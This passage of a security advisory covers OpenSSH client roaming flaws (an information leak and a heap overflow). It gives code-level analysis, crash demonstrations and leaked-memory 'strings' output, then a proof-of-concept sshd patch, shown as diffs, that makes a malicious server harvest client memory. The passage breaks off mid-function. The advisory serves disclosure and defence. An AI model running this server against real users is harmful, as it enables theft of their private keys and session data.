/tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, 